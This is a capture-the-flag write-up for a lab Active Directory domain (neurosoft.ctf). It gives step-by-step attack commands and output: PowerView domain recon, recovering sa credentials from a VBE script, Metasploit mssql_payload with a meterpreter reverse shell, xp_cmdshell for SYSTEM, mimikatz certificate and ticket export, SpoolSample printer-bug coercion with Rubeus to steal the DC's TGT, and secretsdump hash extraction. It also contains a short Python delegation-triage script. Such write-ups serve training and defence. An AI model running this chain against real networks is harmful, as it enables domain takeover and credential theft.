Recon the first AD: dc.neurosoft.ctf

As in any pentest, once host recon is done and a domain account is compromised, the logical next step is to run reconnaissance against the domain itself.

Metasploit has modules for most of this recon, but PowerSploit's PowerView is much simpler to use. Here are a few one-liners inspired by harmj0y's cheat sheet, run through the meterpreter powershell extension.

meterpreter > load powershell

meterpreter > powershell_import /home/mdube/shr/git/PowerSploit/Recon/PowerView.ps1



## Computers

Get-DomainComputer

Get-DomainComputer -domain nsresearch.ctf



## Groups

Get-DomainGroup -Properties name,description,whencreated

Get-DomainGroup -Properties name,description,whencreated -domain nsresearch.ctf



## Groups Membership

Get-DomainGroupMember 'Domain Admins'

Get-DomainGroupMember -domain nsresearch.ctf 'Domain Admins'



## Users

Get-DomainUser -Properties sAMAccountName,description

Get-DomainUser -Properties sAMAccountName,description -domain nsresearch.ctf



## Trusts

Get-DomainTrust



## SPNs

Get-DomainUser -SPN



## Delegation

Get-DomainComputer -Unconstrained

Get-DomainUser -AllowDelegation -AdminCount

Get-DomainComputer -domain nsresearch.ctf -Unconstrained

Get-DomainUser -domain nsresearch.ctf -AllowDelegation -AdminCount

Pwn svc.neurosoft.ctf

To get access to svc.neurosoft.ctf, the player first needed to decode the VBE script located in C:\Users\brandon.harper\Documents\sqldev, grab the sa credentials from it and connect to the MSSQL server. From there, the player could escalate to SYSTEM by enabling xp_cmdshell (the SQL Server service ran as SYSTEM) and uploading a payload.

Here are the detailed steps.

Find the file

... [perform recon] ...



C:\Users\brandon.harper>dir Documents\sqldev

dir Documents\sqldev

Volume in drive C has no label.

Volume Serial Number is 843E-DDE5



Directory of C:\Users\brandon.harper\Documents\sqldev



2019-04-14 08:40 PM <DIR> .

2019-04-14 08:40 PM <DIR> ..

2019-03-23 11:37 AM 633 neurodev_sql_chips_check.vbe

1 File(s) 633 bytes

2 Dir(s) 21,332,369,408 bytes free

Find creds in VBE script

The player could decode the VBE with any of the publicly available decoders; we used a small VBS one (decode_vbe.vbs below).

The simplest approach was to upload the decoder script to the machine and run it there with cscript.

meterpreter > upload /home/mdube/shr/git/ctf-2019/challenges/mdube_sigs/DEV_sqldev_vbe/decode_vbe.vbs

meterpreter > shell

C:\temp>cscript decode_vbe.vbs C:\Users\brandon.harper\Documents\sqldev\neurodev_sql_chips_check.vbe



Const adOpenStatic = 3

Const adLockOptimistic = 3



Set objConnection = CreateObject("ADODB.Connection")

Set objRecordSet = CreateObject("ADODB.Recordset")



objConnection.Open _

"Provider=SQLOLEDB;Data Source=svc.neurosoft.ctf;" & _

"Initial Catalog=neurodevdb;" & _

"User ID=sa;Password=FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ;"



objRecordSet.Open "SELECT * FROM DevChipTargets", _

objConnection, adOpenStatic, adLockOptimistic



objRecordSet.MoveFirst



Wscript.Echo "Number of neurochips deployed: ",objRecordSet.RecordCount,vbCrLf

Get a SYSTEM shell (Solution #1)

The mssql_payload module from Metasploit still works very well after all these years. DisablePayloadHandler is set because we already had a multi/handler listening on the attacker box.

use windows/mssql/mssql_payload
set SRVHOST ::
set RHOSTS 9000:470:beef::11
set PASSWORD FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ
set PAYLOAD windows/x64/meterpreter_reverse_ipv6_tcp
set DisablePayloadHandler true
set LHOST <your_ipv6>
set LPORT 8081
run

# or, with a custom pre-built payload executable
use windows/mssql/mssql_payload
set SRVHOST ::1
set RHOSTS 9000:470:beef::11
set EXE::Custom /payloads/c2nsec/payload_msf_x64.exe
set DisablePayloadHandler true
set PASSWORD FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ
run

The player could grab the flag here: C:\flag.txt.

meterpreter > cat C:\\flag.txt
FLAG-uHTDUrDg6ZqoQP5Ii6YDJuhZCCxH6U

Get a SYSTEM shell (Solution #2)

The second solution uses impacket. If you do not know this collection of Python scripts and classes yet, take the time to read up on it. mssqlclient.py's enable_xp_cmdshell runs the sp_configure 'show advanced options' / 'xp_cmdshell' sequence for you (the INFO lines below are the server acknowledging both changes), and xp_cmdshell then executes commands as the SQL Server service account, here SYSTEM.

$ mssqlclient.py sa:FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ@svc.neurosoft.ctf
SQL> enable_xp_cmdshell
[*] INFO(SVC): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(SVC): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
nt authority\system

The player could grab the flag here: C:\flag.txt.

SQL> xp_cmdshell type c:\flag.txt
FLAG-uHTDUrDg6ZqoQP5Ii6YDJuhZCCxH6U

[Optional] Flag in the encrypted column

There were three ways to get this flag.

Solution 1 (The easy way with CLI)

This step needed to be performed as NEUROSOFT\brandon.harper, because the column master key protecting ImplantPass was a certificate stored in his user certificate store. That is the point of Always Encrypted: decryption happens in the client driver, so the sa login alone only ever sees ciphertext; the certificate is the real secret.

Use the sqlcmd tool with the -g option, which turns on the column encryption setting so that the client decrypts with the certificate already present in the user store.

meterpreter > shell

C:\temp>sqlcmd -S svc.neurosoft.ctf -U sa -P FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ -g



sp_databases

GO



DATABASE_NAME

-------------------------------------------------------------------------

model

msdb

neurodevdb

tempdb



select table_name, column_name from neurodevdb.information_schema.columns

GO



table_name column_name

-------------------------------------------------------------------------

DevChipTargets ChipVesion

DevChipTargets ImplantPass

DevChipTargets Name



(3 rows affected)



USE neurodevdb

select * from DevChipTargets

GO



Changed database context to 'neurodevdb'.

Name ChipVesion ImplantPass

-------------------------------------------------- ---------- --------------------------------------------------

Serenity Cunningham 1.0 31xKOjmqrGhF5plExKwB

Usaamah Barron 0.9 YJmi6v9qH5rFiioZW5oh

Oriana Sheldon 1.0 31xKOjmqrGhF5plExKwB

Juliet Regan 1.1 gvSzEbzwy3665PlMgJkz

Manahil Butt 1.0 31xKOjmqrGhF5plExKwB

Charly Farrow 2.0 DMB6sYhEWd7SvzcKZqhv

Andreas Welsh 1.1 gvSzEbzwy3665PlMgJkz

Daanyal Obrien 1.1 gvSzEbzwy3665PlMgJkz

Campbell Barber 1.0 31xKOjmqrGhF5plExKwB

Kaan Prince 0.9 YJmi6v9qH5rFiioZW5oh

Renesmee Cardenas 1.0 31xKOjmqrGhF5plExKwB

Caelan Mullen 0.9 YJmi6v9qH5rFiioZW5oh

Zacharias Wilkerson 0.9 YJmi6v9qH5rFiioZW5oh

Esmay Eastwood 1.1 gvSzEbzwy3665PlMgJkz

Roberta Cotton 1.1 gvSzEbzwy3665PlMgJkz

Piper Burrows 1.0 31xKOjmqrGhF5plExKwB

Deborah Cordova 2.0 FLAG-wVLX58txoVDIFacSsi7XBcS5lxPrQwL

Neil Worthington 0.9 YJmi6v9qH5rFiioZW5oh

Vivek Forrest 1.0 31xKOjmqrGhF5plExKwB

Finnian Mellor 1.1 gvSzEbzwy3665PlMgJkz

Solution 2 (The easy way with GUI)

This step needed to be performed as NEUROSOFT\brandon.harper, because the encryption key for the column ImplantPass was stored in his certificate store. The player could RDP in and install SQL Server Management Studio to get the flag.

The player needed to open SQL Server Management Studio on the computer holding the certificate and add the line below in the connection dialog's additional connection parameters (Options >> Additional Connection Parameters).

column encryption setting=enabled

Then, by browsing to the database neurodevdb, table DevChipTargets, the flag was in the Deborah Cordova entry.

Solution 3 (The hard way)

Load the kiwi (mimikatz) extension and export the current user's certificates. The private key is marked exportable, which is what makes this work.

meterpreter > load kiwi

Loading extension kiwi...

.#####. mimikatz 2.1.1 20180925 (x64/windows)

.## ^ ##. "A La Vie, A L'Amour"

## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

## \ / ## > http://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )

'#####' > http://pingcastle.com / http://mysmartlogon.com ***/



Success.



meterpreter > kiwi_cmd crypto::stores

Asking for System Store 'CURRENT_USER' (0x00010000)

0. My

1. Root

2. Trust

3. CA

4. UserDS

5. TrustedPublisher

6. Disallowed

7. AuthRoot

8. TrustedPeople

9. ClientAuthIssuer

10. REQUEST

11. SmartCardRoot



meterpreter > kiwi_cmd crypto::certificates

* System Store : 'CURRENT_USER' (0x00010000)

* Store : 'My'



0. Always Encrypted Auto Certificate1

Key Container : 7f0090a8926c247f1e72626509d63e54_c77f5831-6d76-4661-b780-6dc87636cf03

Provider : Microsoft RSA SChannel Cryptographic Provider

Provider type : RSA_SCHANNEL (12)

Type : AT_KEYEXCHANGE (0x00000001)

Exportable key : YES

Key size : 2048



meterpreter > kiwi_cmd "\"crypto::certificates /store:my /export"\"

* System Store : 'CURRENT_USER' (0x00010000)

* Store : 'my'



0. Always Encrypted Auto Certificate1

Key Container : 7f0090a8926c247f1e72626509d63e54_c77f5831-6d76-4661-b780-6dc87636cf03

Provider : Microsoft RSA SChannel Cryptographic Provider

Provider type : RSA_SCHANNEL (12)

Type : AT_KEYEXCHANGE (0x00000001)

Exportable key : YES

Key size : 2048



====================

Base64 of file : CURRENT_USER_my_0_Always Encrypted Auto Certificate1.der

====================

MIIDNjCCAh6gAwIBAgIQTtNNsGFnPaBCVegNyFeuUTANBgkqhkiG9w0BAQsFADAt

MSswKQYDVQQDDCJBbHdheXMgRW5jcnlwdGVkIEF1dG8gQ2VydGlmaWNhdGUxMB4X

DTE5MDQxNzIxMzMyMFoXDTIwMDQxNzIxMzMyMFowLTErMCkGA1UEAwwiQWx3YXlz

IEVuY3J5cHRlZCBBdXRvIENlcnRpZmljYXRlMTCCASIwDQYJKoZIhvcNAQEBBQAD

ggEPADCCAQoCggEBANHIrKwuUk+ZL24068RsxGkFhSbxUqgYKlvR0pDyUN5f4gUZ

pbkLvyB2ltep9buWcJgDOSVmx5KXq8+9AMG4WtZ1tkV0CYVCcaK61Ub6W9nXQa59

VvIXq785GLm8gjXPv4SpV4FveqUbLItkz7xqf2y2h8faP0Fl21/srM/XsLAkgtyQ

E2ZILGATWHNlXgjoeljAI/exTFyxhGFEeudorQpSD+f3dQgEe+kBugkuNxo7czIr

Ji43khnpuchQK7z5ctsloFpB7rF/UXjEG4mlqO4AxjV3/cBCruDnRIVSLEN+0Wfc

NrBTzVM7SWwhSPDK0vU5XLqKxBAy+NEmSQM9uU0CAwEAAaNSMFAwHwYDVR0lBBgw

FgYIKwYBBQUIAgIGCisGAQQBgjcKAwswHQYDVR0OBBYEFI7p3Du6iXp8KbAm63h1

vrvbiT6lMA4GA1UdDwEB/wQEAwIFIDANBgkqhkiG9w0BAQsFAAOCAQEAKqaE9HhR

4SJgIoiFoyQSSxHr/TXAuVJQJH9HlkP/fJfcMbqzwxh3qSuEBPvw6etfmSgR2n3l

UiaM1nyz1r7LX0UEw530Rwxc61nsRNZ3z4UAhn7btQxODRhYnOibENWiK5EzdE93

RGC8iiVWrL0R6S0SMMMbZaMhJNUUQ2zRjAByWa6tV+cfp1cQZN5w3EH+Gpeeay2j

9p9puUU/W0oBq2EIciTdL3VeRBVPT61oZOwnh2jLtp93v6lPEJ5xCXd2zPEThrD4

QYTUJqOf9da+CA4IzUvVT5HGR3OZEkktoQPRyubBh9V3zC8AoV1aFrZrU8Fk6C7i

Un1d4+lL6mlQdw==

====================

Public export : OK - 'CURRENT_USER_my_0_Always Encrypted Auto Certificate1.der'



====================

Base64 of file : CURRENT_USER_my_0_Always Encrypted Auto Certificate1.pfx

====================

MIIKPgIBAzCCCfoGCSqGSIb3DQEHAaCCCesEggnnMIIJ4zCCBgwGCSqGSIb3DQEH

AaCCBf0EggX5MIIF9TCCBfEGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcN

AQwBAzAOBAh7G7NcfwkPkwICB9AEggTYZTLwljq+dlIYkJFfAl6CJ3q6hoTVYK9x

Ljq8R2m3zmv0HP7DyhjhKv7OAoSRudUwC/lemN1F92ET47ZDKWBx6ssVAMMLTpTx

Yi3i2t7CyqbY5oTp9apb+0c7GOh+chWoGCatnH24+NK9/TWa9swSwgWVpNR8Oivf

KXGWVfCqoNFjwq+F2/oGyyMwyNI69+bRSCfyaOq5+pgibb3zmnle2X/oPKhP7/NH

TFiy7AdvYe5ZEcN+BAnuhnzSguEOey4XhnFh9gXcskkMb61OqyljRAvRLJpCCxO7

5BYeBjwLW2XhprDV2sEXrHMBBcZCqQXeggbp9fJDCLhmZ0HVm9W0FuEtDDCItw2p

wrquvBVFl8MN13wICvtgWhNP+Q13+jF5vxFHGWL54TAPT7Kt8lSfZALMW1bp3g0I

FfISwMrKGZco8hDCPvw+WOeIpOH9JxUxzb87rvebAcXl70aSs0y/ANoNgjPkjMsp

DZNYQqYbQREuHlvpTngT9X+chh0PF2RrdZeB5vf8elYlrx7cnWG1C0KLcln1qQFL

K1IXeEid86wtL4SETxyY48G03WbHy1swfRhLb//M+wvpv9o5Cez+5oBzgsqnDK5H

N4tg+uLpUg1AEd7JfeVtb2Z9ssrlivfCguu0ZEQTnojL17tLYpsYveoNrjPBaD6A

PtQ1jv4IEUakcc8a8t+5kyV68rpJXXmu1iExuSZg01YRghNv0in9a62kmRNwDwMG

h4rqPvOULXnp+9E7G7u9JznDllDtgy7WvyeBcmbedGFkF72otz4rlfHqq+zsvOiX

36RWoyeoQvskn5kAezeMGCRgtcM7kyxBO2/JhTRjLmJ+5dGtYVxHUIkeJZOUepjh

CcgRtQX45ln8EWvLtAbXh36VoITeXefu3Idu6ppJa0ubPaQ/BtX3qzQ1flqTQwWg

O0Xz9jyfYhSRWhcGM38jusAi/YXBUEYJyVdTOjYcVtIkieSNKZsGS7A005H8uAx6

IKYB/Ez0Qjw7hZNMIme1C1VcMBcISRikwmRGWhFMyPpQcKbpbrtJFoCr13mXjVWS

pP1c4Wtm+peD6D/PNip8HX2wSq41Y42xZ4dJqvE5imRmoN+Q8YL9D4BsQp9ZPlsL

AHxqcqTbBFtbVkOa0EYZ1WLFnQJSxbs0HghF/951jyE45+SZni+INKYwY0mgHpQ/

aWNgmBBfVmFJuGr9crf93EMoCZNFoWIaVUcsZV+AnMkBMvHzUkSiKWS0gRzI3NIj

ze+ZEHNBWIyJobjKRSxy99oDvCATo2hA4DHhQajEzyjDW5vA74QcFCMTMC9ItHx8

1HqRvmZVDmXGjR0spafOw4Rp134F+y0m8/E8hKUl7QqClOTZuxSF7x59TAxKZ6nQ

smJH6r4B/Kn8gbGT4oT4ejOmNVCRHkNMVzyIZwL++I5iuHHlORaxOV/CWhZ+j22N

3VnvUaaIhA+5wF4LaHreHTZJ25ZP/Hp/azbs+olVNzSQfJ8dKh1/7g3ROPnEcJgy

39MEqndgfW0gGbUjbMfkFce9QysFuviIFXaCpQIqhLnOpq5Vt2LWa5dGkDvqKoBx

bwuFtVEBcwYlfrmbLYAxl82WHZvp1kpF+rkUFcVrQRsPVGI/RORplB0jR0JyFWpG

qdX/1fB//+xZRctiqOECSzGB3zATBgkqhkiG9w0BCRUxBgQEAQAAADBdBgkqhkiG

9w0BCRQxUB5OAHQAcAAtADkAYgA0ADMAOABjAGMAOQAtADIAMgAyADAALQA0ADUA

MgBmAC0AYgA1AGYANwAtAGYANQAxADEANQBlADUAYQBkADcAOAA3MGkGCSsGAQQB

gjcRATFcHloATQBpAGMAcgBvAHMAbwBmAHQAIABSAFMAQQAgAFMAQwBoAGEAbgBu

AGUAbAAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABl

AHIwggPPBgkqhkiG9w0BBwagggPAMIIDvAIBADCCA7UGCSqGSIb3DQEHATAcBgoq

hkiG9w0BDAEDMA4ECFxfCAPaPlhJAgIH0ICCA4ijH8FFsQpW2n7hOsPjWZy4zsB7

QanQFQS5cso9vWqfaQnWrNved8TQ0UoxI0q2JkbiJ9kRdjy/9F9eNjUcSFicKUnZ

OR2eGe07HzDIThZua1aLFUi+b9DgPYbqoH3/8WsrAvdVY1wz3IEilg2HRyqhJyiy

R4VJo+Rq/G21H70KsIGTAAUIkb8j6iS2LVjwPobEnIvIzWPferNMr1cbs7e0AqZ1

e4TznvtJNxgOr9iw9cqq46hrxB/VfAQSG+0iWDkZTInk3Y89VLrVividICQCQyVF

NOqbM2hzaXBe/3/F1LRbZmvahw5WLAS+Rqj08J6punSNfTSkBbZljWGx7mGMNrsx

r4NEMgxu2zZ6WKQKKP2dn4N58hskyihishSnP5ouulOBJQLcgVKQ1oR0voM5ar4M

bCxeggEbwbN4EZaYgNYJwZDSCThu+gh8y20vrmZ6HtMYgXq4zU2p/qp4dHl4HHMH

gCoHor1lh1XVo8y6iEzsJ5UrmbRNGfDVBLCngWdXb7spznt2TI7ipzSKHQYBi5PX

8CUf79rEJxi0+ikiRz1WFSRcaX/3rVWZwwvNZErs+/lj6QdhjyHxb5NmQPqyINFd

eyAfWf42Ec/D2PwhAVzRIUfyt84UHyyQ9uEU1ca6u6cJ7Q8rwL2dypRHB4WOAXPo

Tkag+PpcJHKnbLaMR69Iq1M2e0uzMPTJ4tbG6mXjur2j1ciaNkb6qpmnXn7Zb0gH

GMLSLUqWdDt+oxc8hRsfFCdk8tvrFkkfihKFsCfv42Rm3GFdWInLrWMFNnVkmxm+

UCA0yYGy8yMmdoRzpL8dMIyDXFaCnNF6xTZ/WV74USYwENILeW84kgz7NufX5l1z

bruefaJT0elWnYo0Zn9xFQr+hGsCO8N6rY0PfxDECpj2sYkHc7/8B7H2bpO+pCB9

02lDu3DiL5s/AStVSpKHQv2plwE3GrXJWsjDrN/c87mMOyli/gn2j1j2jTxX8OIo

+vDrx9RKMgW6VJEgoyGFo0hDUIHxbtbWg4ACaxN1unyok0XTInmVJ4GXcJn0YuW3

A2ctpG7IT/J2/DEzjdCiD0kghDYYTYH75RG13WKGeLxfesWR6X9bazjmArLUP5gd

aqSDUgQlrHguUn/hSZK80II68Oc/4w8fUUoqGUPrhkDFuKwXAomgBYSHwDXzsk1N

qFHEh2GkfbfrLFmDZT0siwwA7Rb0MDswHzAHBgUrDgMCGgQUF6hZeblohdyDcaOt

sUDjSr551GMEFM/Y652JjUrkDbB674DnzdqfHI3vAgIH0A==

====================

Private export : OK - 'CURRENT_USER_my_0_Always Encrypted Auto Certificate1.pfx'

Download CURRENT_USER_my_0_Always Encrypted Auto Certificate1.pfx and import it on a Windows machine with SQL Server Management Studio installed.

Double-click the pfx file to launch the certificate import wizard:

Store location: Current User
Select the file name
Enter password: mimikatz (mimikatz protects every PFX it exports with this password)
Keep the option "Automatically select the certificate store..."

Then open SQL Server Management Studio and add the line below in the connection dialog's additional connection parameters.

column encryption setting=enabled

Then, by browsing to the database neurodevdb, table DevChipTargets, the flag was in the Deborah Cordova entry.

Status at this point

msf5 exploit(windows/mssql/mssql_payload) > sessions -lx

Active sessions
===============

  Id  Name  Type                     Checkin?  Enc?  Local URI  Information                     Connection
  --  ----  ----                     --------  ----  ---------  -----------                     ----------
  1         meterpreter x64/windows  16s ago   Y     ?          DEV\brandon @ DEV               fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49720 (9000:470:beef::12)
  2         meterpreter x86/windows  14s ago   Y     ?          NT AUTHORITY\SYSTEM @ DEV       fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8080 -> 9000:470:beef::12:49721 (9000:470:beef::12)
  3         meterpreter x64/windows  10s ago   Y     ?          NT AUTHORITY\SYSTEM @ DEV       fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49722 (9000:470:beef::12)
  4         meterpreter x64/windows  55s ago   Y     ?          NEUROSOFT\brandon.harper @ DEV  fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49733 (9000:470:beef::12)
  5         meterpreter x64/windows  29s ago   Y     ?          NT AUTHORITY\SYSTEM @ SVC       fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::11:54535 (9000:470:beef::11)

Pwn dc.neurosoft.ctf

At this point, the player had SYSTEM privileges on two of the three boxes of the neurosoft.ctf domain. The only one left was dc.neurosoft.ctf, the Domain Controller.

Identify Vulnerability

The standard way to compromise a DC is to compromise a member of the "Domain Admins" group. Here, however, Administrator was the only member, that account was not logged on anywhere, and its password was neither stored in a file nor weak. The player had to be creative.

C:\temp>net group "Domain Admins" /domain
The request will be processed at a domain controller for domain neurosoft.ctf.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

The player should already have noticed during the domain recon phase that svc.neurosoft.ctf is configured for unconstrained delegation. Domain controllers always carry TRUSTED_FOR_DELEGATION, so DC in the output below is expected; a member server (WORKSTATION_TRUST_ACCOUNT) with that flag is the finding.

meterpreter > load powershell
meterpreter > powershell_import /home/mdube/shr/git/PowerSploit/Recon/PowerView.ps1
meterpreter > powershell_shell
PS > Get-DomainComputer -Unconstrained -Properties cn,useraccountcontrol

cn  useraccountcontrol
--  ------------------
DC  SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
SVC WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

PS > Get-DomainUser -AllowDelegation -AdminCount -Properties cn,useraccountcontrol

cn            useraccountcontrol
--            ------------------
Administrator NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
krbtgt        ACCOUNTDISABLE, NORMAL_ACCOUNT
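The triage the two PowerView queries above perform, as an added Python example that is not part of the original write-up: it decodes the userAccountControl bit flags the way PowerView prints them and separates the expected unconstrained-delegation host (the DC) from the anomaly (a member server), then lists the privileged accounts whose TGT could be delegated. The records are constructed to mirror the output above; DEV, web01 and protected.svc are assumptions added for contrast.

```python
"""Decode userAccountControl and triage delegation settings.

Added example, not from the original write-up: the same triage the two PowerView
queries do, on constructed records standing in for the LDAP attributes.
"""

# userAccountControl bits (ADS_USER_FLAG_ENUM) relevant to delegation and to
# reading PowerView's output
UAC_FLAGS = {
    0x00000002: "ACCOUNTDISABLE",
    0x00000200: "NORMAL_ACCOUNT",
    0x00001000: "WORKSTATION_TRUST_ACCOUNT",
    0x00002000: "SERVER_TRUST_ACCOUNT",
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00080000: "TRUSTED_FOR_DELEGATION",
    0x00100000: "NOT_DELEGATED",
    0x01000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
SERVER_TRUST_ACCOUNT = 0x00002000
TRUSTED_FOR_DELEGATION = 0x00080000
NOT_DELEGATED = 0x00100000
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000


def decode_uac(value):
    """Flag names set in a userAccountControl integer, in ascending bit order
    (the order PowerView prints them in)."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def delegation_findings(computers):
    """Classify computers trusted for delegation.

    Every DC carries TRUSTED_FOR_DELEGATION (with SERVER_TRUST_ACCOUNT set), so it
    is expected there; on a member server it is the finding. TRUSTED_TO_AUTH_FOR_DELEGATION
    is constrained delegation with protocol transition, weaker but still noteworthy.
    """
    findings = {}
    for c in computers:
        uac = c["userAccountControl"]
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            findings[c["cn"]] = "unconstrained delegation on a member server"
        elif uac & TRUSTED_FOR_DELEGATION:
            findings[c["cn"]] = "unconstrained delegation (domain controller, expected)"
        elif uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings[c["cn"]] = "constrained delegation with protocol transition"
    return findings


def delegatable_admins(users):
    """Privileged users (adminCount=1) whose TGT may be delegated, i.e. NOT_DELEGATED
    unset: if one of them authenticates to an unconstrained host, its TGT is up for grabs."""
    return [u["cn"] for u in users
            if u.get("adminCount") == 1 and not u["userAccountControl"] & NOT_DELEGATED]


# Constructed records mirroring the PowerView output above (DC, SVC, Administrator,
# krbtgt); DEV, web01 and protected.svc are made-up entries added for contrast.
COMPUTERS = [
    {"cn": "DC", "userAccountControl": 0x2000 | 0x80000},
    {"cn": "SVC", "userAccountControl": 0x1000 | 0x80000},
    {"cn": "DEV", "userAccountControl": 0x1000},
    {"cn": "web01", "userAccountControl": 0x1000 | 0x1000000},
]
USERS = [
    {"cn": "Administrator", "userAccountControl": 0x200 | 0x10000, "adminCount": 1},
    {"cn": "krbtgt", "userAccountControl": 0x2 | 0x200, "adminCount": 1},
    {"cn": "brandon.harper", "userAccountControl": 0x200},
    {"cn": "protected.svc", "userAccountControl": 0x200 | 0x100000, "adminCount": 1},
]

if __name__ == "__main__":
    for c in COMPUTERS:
        print("%-14s %s" % (c["cn"], ", ".join(decode_uac(c["userAccountControl"]))))
    for cn, why in delegation_findings(COMPUTERS).items():
        print("%-14s %s" % (cn, why))
    print("delegatable privileged users:", delegatable_admins(USERS))
```

Against the records above it reports SVC as the only member server with unconstrained delegation and Administrator and krbtgt as privileged accounts whose TGT could be delegated; protected.svc is excluded because "account is sensitive and cannot be delegated" (NOT_DELEGATED) is set.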

By design, we built two paths to Domain Admins privileges into the track. Unfortunately, the second one broke because the Domain Controller's computer account password CHANGED during track preparation (machine accounts rotate their password every 30 days by default), so the hash recoverable from the backup no longer matched the live DC$ key. Details below.

Method 1 — Unconstrained Delegation

2018 was a rough year for Microsoft. harmj0y made public on his blog that forest trusts are not security boundaries; the same article shows how an attacker can compromise a Domain Controller by abusing unconstrained delegation (and much more).

In short: when a client authenticates with Kerberos to a server trusted for unconstrained delegation, the client sends along a forwarded copy of its Ticket Granting Ticket (the KDC marks the service ticket ok-as-delegate, and Windows clients comply), and the server keeps that TGT in LSASS memory so it can impersonate the client to other services. Here, the player could force dc.neurosoft.ctf to authenticate to svc.neurosoft.ctf by triggering the Printer Bug (the spooler's RpcRemoteFindFirstPrinterChangeNotification call) with SpoolSample, linked below; the DC$ TGT then lands on svc, where the player already had SYSTEM. To read it out, the player could use kekeo, mimikatz or Rubeus.

For detailed explanations of advanced Windows attacks, we invite you to take a look at harmj0y's blog or PyroTek3's (Sean Metcalf's) articles.



## Step 1: from dev.neurosoft.ctf, logged in as brandon.harper
## Download: https://github.com/leechristensen/SpoolSample
## Compile in Visual Studio
meterpreter > upload /payloads/vs_build/SpoolSample.exe
meterpreter > shell
C:\temp>.\SpoolSample.exe dc.neurosoft.ctf svc.neurosoft.ctf

## Step 2: from svc.neurosoft.ctf, logged in as SYSTEM
meterpreter > cd C:\\temp
meterpreter > upload /payloads/mimikatz/mimi_x64.exe
meterpreter > shell
C:\temp>.\mimi_x64.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt [0;2e85a]-2-0-60a10000-DC$@krbtgt-NEUROSOFT.CTF.kirbi

Or, using Rubeus and meterpreter channels (Rubeus monitor waits for the incoming logon, so the timing no longer matters):

## Step 1: from svc.neurosoft.ctf, logged in as SYSTEM
## Upload and start Rubeus
### Rubeus needs to be compiled with .NET 4.0 (not the default 3.5)
msf5 > sessions -i 5
meterpreter > cd C:\\temp
meterpreter > upload /payloads/vs_build/Rubeus.exe
meterpreter > shell
C:\temp>.\Rubeus.exe monitor /interval:3
C:\temp>^Z
Background channel 1? [y/N] y

## Step 2: from dev.neurosoft.ctf, logged in as brandon.harper
## Download: https://github.com/leechristensen/SpoolSample
## Compile in Visual Studio
meterpreter > sessions 3
meterpreter > upload /payloads/vs_build/SpoolSample.exe
meterpreter > shell
C:\temp>.\SpoolSample.exe dc.neurosoft.ctf svc.neurosoft.ctf
C:\temp>^C
Terminate channel 1? [y/N] y

## Step 3: from the same meterpreter as step 1
## Read Rubeus output
meterpreter > sessions 5
meterpreter > channel -i 1
Interacting with channel 1...

[+] 2019-10-15 1:54:01 PM - 4624 logon event for 'NEUROSOFT.CTF\DC$' from '9000:470:beef::10'
[*] Target LUID     : 0x31f43
[*] Target service  : krbtgt
  UserName                 : DC$
  ...
  Base64EncodedTicket   : <base64 blob omitted>

[*] Extracted 1 total tickets

meterpreter > shell
C:\temp>.\Rubeus.exe ptt /ticket:<the base64 ticket>

[*] Action: Import Ticket
[+] Ticket successfully imported!

Method 2 — Silver Ticket via a backup service (broken)

Steal the BackupSVCUser TGT from LSASS with mimikatz and inject it into the current session.

meterpreter > upload /payloads/mimikatz/mimi_x64.exe

meterpreter > shell

C:\temp>.\mimi_x64.exe

mimikatz # privilege::debug

mimikatz # sekurlsa::tickets /export

mimikatz # kerberos::ptt [0;6f015]-2-0-60a10000-BackupSVCUser@krbtgt-NEUROSOFT.CTF.kirbi

With that ticket, access the SVCbackups share on dc.neurosoft.ctf and grab flag.txt and the content of the preDCbak folder.

C:\temp>dir \\dc.neurosoft.ctf\SVCbackups
 Directory of \\dc.neurosoft.ctf\SVCbackups

2019-03-23  03:25 PM    <DIR>          .
2019-03-23  03:25 PM    <DIR>          ..
2019-03-23  03:25 PM                35 flag.txt
2019-03-23  03:23 PM    <DIR>          preDCbak
               1 File(s)             35 bytes
               3 Dir(s)  44,482,936,832 bytes free

Copy the registry hive backups (SAM, SECURITY and SYSTEM) from the preDCbak folder and extract the DC machine account hash offline with impacket's secretsdump.py. The SYSTEM hive provides the boot key needed to decrypt the LSA secrets in SECURITY, which is where $MACHINE.ACC lives.

$ secretsdump.py -system system.save -security security.save -sam sam.save LOCAL …

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:db26062ffbf19e6492f4baa3a5109344

…

To build a silver ticket, the player first needed the domain SID. It can be read from any domain account's SID (everything up to, but not including, the trailing RID) with a shell command, or directly with PowerView.

# From a shell
C:\temp>whoami /user

USER INFORMATION
----------------

User Name      SID
============== ==============================================
neurosoft\...  S-1-5-21-2892396748-947681171-1598779583-...

# From PowerView
PS > Get-DomainSID

